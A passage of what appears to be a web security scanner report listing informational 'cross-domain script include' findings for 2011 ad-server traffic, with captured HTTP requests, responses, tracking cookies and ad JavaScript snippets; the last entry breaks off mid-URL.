Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676480&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658480882&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658480896&frm=1&adk=2614322350&ga_vid=653637234.1303658481&ga_sid=1303658481&ga_hid=1490794474&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=18
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 24 Apr 2011 15:21:19 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7589

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 23 13:36:24 EDT 2011 -->
<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.3. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=c4bd92c5&rnd=52328011882491410&clkurl=http://ib.adnxs.com/click/zszMzMzM3D_NzMzMzMzcPwAAAMDMzARA-oTsvI3N5T_5hOy8jc3lPw371D7bYuY9SsYda6b2ziWMP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADIpAIA0WMAAAEAAABVU0QAVVNEANgCWgAbC0sAAg8BAgUCAAQAAAAAFywibgAAAAA./cnd=!CxAduAiQmQMQyMkKGAAg0ccBKEsxRkF1FY7N5T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBxA4vjD-0TaSTNcyBlgeAsZ25A9fq-NMBr56U7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYS5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmALCA8ACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAb746GF_uDvrsAB%26num%3D1%26sig%3DAGiWqtzq6jdVFSiz91eOPCoaaXhjQFcD_w%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658383860&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658383865&frm=1&adk=513358139&ga_vid=27783855.1303658384&ga_sid=1303658384&ga_hid=2094739292&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUI2s0JMGhZPIDYO0t7dlEyAtu1iADA3gBY2BgEGBg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36HhJ02VK4NKPcdKOcCk2s_uXMTLn3tJ2fU4pQ7IbwYp9yxBY9wyh39KohTbsYCdtxytq045aY_9MQt17ESt5ypLk65aTcVccpVlvkyME0OZWB1eMLAqJPHwPBR6D8QgMI6P4CxmoHJ34aB5YU3A6MWEwPDpWewsE5TnhUElLOCyjEC5R7A5ZSk1IFsRtx2dgsB5Rl8N2cwMHAAI3YnI1AxQ.AtRiYgxWDAyMDLwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZ2OHpAWQYAwD8zXas

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUGEe16DD_.i537edfAbbPWkakQ6kDA3gBY2BgEGRg6lzCwJLdxsDI.52B4YYLAwMDJwMDo36HhPttqFwLUO4nUM4NIWenjUtf.8mdm3Dpaz85oxan3AnhxTjlji14hFPu6FeYHzDc2T5jATtOfTNsW3HKTX_oiVuuYyVuOVNdnHLTbirilKss82VgmhzKwOrwhIFRJ4.B4aPQfyAAxUN.AGM1A5O_DQPLC28GRi0mBoZLz2DxkKY8KwgoZwWVYwTKPYDLKUmpA9mMuO3sFgLKM_huzmBg4ABG.k5GoGKGwFuMTECKwYCRgY.BQcEMLLi0ACzIksnICpRjCWFiZWQDMuR3MTKww9MKyDAGABgQfac-; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 15:19:43 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5122
Date: Sun, 24 Apr 2011 15:19:43 GMT

_289670_amg_acamp_id=166308;
_289670_amg_pcamp_id=69111;
_289670_amg_location_id=55364;
_289670_amg_creative_id=289670;
_289670_amg_loaded=true;
var _amg_289670_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732014/direct/01/rnd=1778809137/rnd=1778809137?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU9J3wUw8q4YExaZwcQwxmt94lwjdnZW8sdXNhLHQsMTMwMzY1ODM4MzMyMyxjLDI4OTY3MCxwYyw2OTExMSxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL3pzek16TXpNM0RfTnpNek16TXpjUHdBQUFNRE16QVJBLW9Uc3ZJM041VF81aE95OGpjM2xQdzM3MUQ3Yll1WTlTc1lkYTZiMnppV01QN1JOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFESXBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0FiQzBzQUFnOEJBZ1VDQUFRQUFBQUFGeXdpYmdBQUFBQS4vY25kPSFDeEFkdUFpUW1RTVF5TWtLR0FBZzBjY0JLRXN4UmtGMUZZN041VDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vY2xpY2tlbmM9aHR0cDovL2dvb2dsZWFkcy5nLmRvdWJsZWNsaWNrLm5ldC9hY2xrP3NhPWwmYWk9QnhBNHZqRC0wVGFTVE5jeUJsZ2VBc1oyNUE5ZnEtTk1CcjU2VTdCaWZ4TzNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKN29PSThLUHNFb0lCRjJOaExYQjFZaTAyT0RnNE1EWTFOalk0TWpreU5qTTRvQUhEOHYzc0E3SUJGM0IxWWk1eVpYUmhhV3hsY2kxaGJXRjZiMjR1Ym1WMHVnRUpOekk0ZURrd1gyRnp5QUVKMmdGSWFIUjBjRG92TDNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjBMMkpoYm01bGNsODNNamhmT1RCZllTNXdhSEFfYzJWaGNtTm9QU1UzUWlSclpYbDNiM0prSlRkRW1BTENBOEFDQk1nQ2hkTFBDcWdEQWVnRHZBSG9BNVFDOVFNQUFBREVnQWI3NDZHRl91RHZyc0FCJm51bT0xJnNpZz1BR2lXcXR6cTZqZFZGU2l6OTFlT1BDb2FhWGhqUUZjRF93JmNsaWVudD1jYS1wdWItNjg4ODA2NTY2ODI5MjYzOCZhZHVybD0K/clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU9J3wUw8q4YExaZwcQwxmt94lwjdnZW8sdXNhLHQsMTMwMzY1ODM4MzMyMyxjLDI4OTY3MCxwYyw2OTExMSxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL3pzek16TXpNM0RfTnpNek16TXpjUHdBQUFNRE16QVJBLW9Uc3ZJM041VF81aE95OGpjM2xQdzM3MUQ3Yll1WTlTc1lkYTZiMnppV01QN1JOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFESXBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0FiQzBzQUFnOEJBZ1VDQUFRQUFBQUFGeXdpYmdBQUFBQS4vY25kPSFDeEFkdUFpUW1RTVF5TWtLR0FBZzBjY0JLRXN4UmtGMUZZN041VDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vY2xpY2tlbmM9aHR0cDovL2dvb2dsZWFkcy5nLmRvdWJsZWNsaWNrLm5ldC9hY2xrP3NhPWwmYWk9QnhBNHZqRC0wVGFTVE5jeUJsZ2VBc1oyNUE5ZnEtTk1CcjU2VTdCaWZ4TzNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKN29PSThLUHNFb0lCRjJOaExYQjFZaTAyT0RnNE1EWTFOalk0TWpreU5qTTRvQUhEOHYzc0E3SUJGM0IxWWk1eVpYUmhhV3hsY2kxaGJXRjZiMjR1Ym1WMHVnRUpOekk0ZURrd1gyRnp5QUVKMmdGSWFIUjBjRG92TDNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjBMMkpoYm01bGNsODNNamhmT1RCZllTNXdhSEFfYzJWaGNtTm9QU1UzUWlSclpYbDNiM0prSlRkRW1BTENBOEFDQk1nQ2hkTFBDcWdEQWVnRHZBSG9BNVFDOVFNQUFBREVnQWI3NDZHRl91RHZyc0FCJm51bT0xJnNpZz1BR2lXcXR6cTZqZFZGU2l6OTFlT1BDb2FhWGhqUUZjRF93JmNsaWVudD1jYS1wdWItNjg4ODA2NTY2ODI5MjYzOCZhZHVybD0K/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69111&c5=166308&c6=&cv=1.3&cj=1&rn=1201744682" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

24.4. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=87014582729898400&clkurl=http://ib.adnxs.com/click/mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAxSCwcmgR6T_FILByaBHpPy8ukoDR0nkkSsYda6b2ziVyTbRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAGw8BAgUCAAQAAAAAzCL1pwAAAAA./cnd=!QxFr_wiQmQMQxskKGAAg0ccBKEsx4pnD62gR6T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBboJnck20TcilAsHjlQeFvP34Atfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtwVrMHKKZVemRm5XFLaOSGOVALJPg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679940&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661940967&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303661940980&frm=1&adk=2614322350&ga_vid=1707812897.1303661941&ga_sid=1303661941&ga_hid=785527466&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36813005&fu=4&ifi=1&dtd=16
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAU4Ho4GhMNTO2javi9DkYkdWBJL5gDA3gBY2BgEGJg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36HawMHVK4NKPcdKOcCl5Nwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiJOucoyXwamyaEMrA5PGBh18hgYPgr9BwJQHOUHMFYzMPnbMLC88GZg1GJiYLj0DBZHacqzgoByVlA5RqDcA7ickpQ6kM2I285uIaA8g._mDAYGDmCC2MkIVMwQeIuRCUgxGDAy8DMwKJiBBZcWgAVZMhlZgXIsIUysjGxAhvwuRgYueDoCGcYAAOS4gxQ-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUWF_DD0u2mL445Kc9YoToMfDv8fQDA3gBY2BgEGZg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36H34QQnHKuDRxQuTagvu9AfS5wfRLut3Hqk7DTxqWv_eTOTbj0tZ.cUYtT7oTwYpxyxxY8wil39KsgTrkZC9hxy9m24pSb_tATt1zHStxypro45abdVMQpV1nmy8A0OZSB1eEJA6NOHgPDR6H_QACKv_wAxmoGJn8bBpYX3gyMWkwMDJeeweIoTXlWEFDOCirHCJR7AJdTklIHshlx29ktBJRn8N2cwcDAAUwsOxmBihkCbzEyASkGA0YGAQYGBTOw4NICsCBLJiMrUI4lhImVkQ3IkN_FyMAFT2MgwxgAToqJtQ--; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 16:19:00 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4054
Date: Sun, 24 Apr 2011 16:19:00 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=1328357053?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4BYzzRrrTdej4JWAfsQb4gI__KtnZW8sdXNhLHQsMTMwMzY2MTk0MDgyMSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL21wbVptWm1adVQtYW1abVptWm01UHdBQUFFQXpNd2RBeFNDd2NtZ1I2VF9GSUxCeWFCSHBQeTh1a29EUjBua2tTc1lkYTZiMnppVnlUYlJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUd3OEJBZ1VDQUFRQUFBQUF6Q0wxcHdBQUFBQS4vY25kPSFReEZyX3dpUW1RTVF4c2tLR0FBZzBjY0JLRXN4NHBuRDYyZ1I2VDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJib0puY2syMFRjaWxBc0hqbFFlRnZQMzRBdGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTR2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjlpTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkaE5tUTBZcGdDWk1BQ0JNZ0NoZExQQ3FnREFlZ0R2QUhvQTVRQzlRTUFBQURFZ0Fib3Q4NnF3WTZ5aHRFQiZudW09MSZzaWc9QUdpV3F0d1ZyTUhLS1pWZW1SbTVYRkxhT1NHT1ZBTEpQZyZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=72849306" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

24.5. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=23590900609269740&clkurl=http://ib.adnxs.com/click/KVyPwvUo3D8pXI_C9SjcPwAAAEAzMwdA-yE2WDiJ9T_7ITZYOIn1P5sh1rsNl6JOSsYda6b2ziWKP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAvA8BAgUCAAQAAAAAlSLaQwAAAAA./cnd=!rxFGFgiQmQMQxskKGAAg0ccBKEsx_5TyvDiJ9T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB6NSjij-0TZz1AoqGlgeeu_m4A9fq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYArgDwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzghi4ziRoyAyYDhZkLYBiHzlX2Ow%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381013&bpp=8&shv=r20110420&jsv=r20110415&correlator=1303658381040&frm=1&adk=2614322350&ga_vid=1758512325.1303658381&ga_sid=1303658381&ga_hid=1384201995&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=32
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUJkj0tjnVs6ZlxPKJLhIj3dCVZY8DA3gBY2Bg4Gdg6lzCwJLdxsDI.52B4YYLAwMDJwMDo377yZ2boHItQLmfQDk3hNyMWpxyJ4QX45Q7tuARTrmjXwVxys1YwI5bzrYVp9z0h5645TpW4pYz1cUpN.2mIk65yjJfBqbJoQysDk8YGHXyGBg.Cv0HAlB45gcwVjMw.dswsLzwZmDUYmJguPQMFp5pyrOCgHJWUDlGoNwDuJySlDqQzYjbzm4hoDyD7.YMBgYOYOTtZAQqZgi8xcgEpBgMGBl4GBgUzMCCSwvAgiyZjKxAOZYQJlZGNiBDfhcjAzs8zkGGMQAAIjhy0w--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUI2s0JMGhZPIDYO0t7dlEyAtu1iADA3gBY2BgEGBg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36HhJ02VK4NKPcdKOcCk2s_uXMTLn3tJ2fU4pQ7IbwYp9yxBY9wyh39KohTbsYCdtxytq045aY_9MQt17ESt5ypLk65aTcVccpVlvkyME0OZWB1eMLAqJPHwPBR6D8QgMI6P4CxmoHJ34aB5YU3A6MWEwPDpWewsE5TnhUElLOCyjEC5R7A5ZSk1IFsRtx2dgsB5Rl8N2cwMHAAI3YnI1AxQ.AtRiYgxWDAyMDLwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZ2OHpAWQYAwD8zXas; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 15:19:40 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4063
Date: Sun, 24 Apr 2011 15:19:39 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=1451138540?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU6NCLQDiYTAgBdSvSzXm6spUaEepnZW8sdXNhLHQsMTMwMzY1ODM4MDg0MyxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0tWeVB3dlVvM0Q4cFhJX0M5U2pjUHdBQUFFQXpNd2RBLXlFMldEaUo5VF83SVRaWU9JbjFQNXNoMXJzTmw2Sk9Tc1lkYTZiMnppV0tQN1JOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQXZBOEJBZ1VDQUFRQUFBQUFsU0xhUXdBQUFBQS4vY25kPSFyeEZHRmdpUW1RTVF4c2tLR0FBZzBjY0JLRXN4XzVUeXZEaUo5VDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUI2TlNqaWotMFRaejFBb3FHbGdlZXVfbTRBOWZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXJnRHdBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0emdoaTR6aVJveUF5WURoWmtMWUJpSHpsWDJPdyZjbG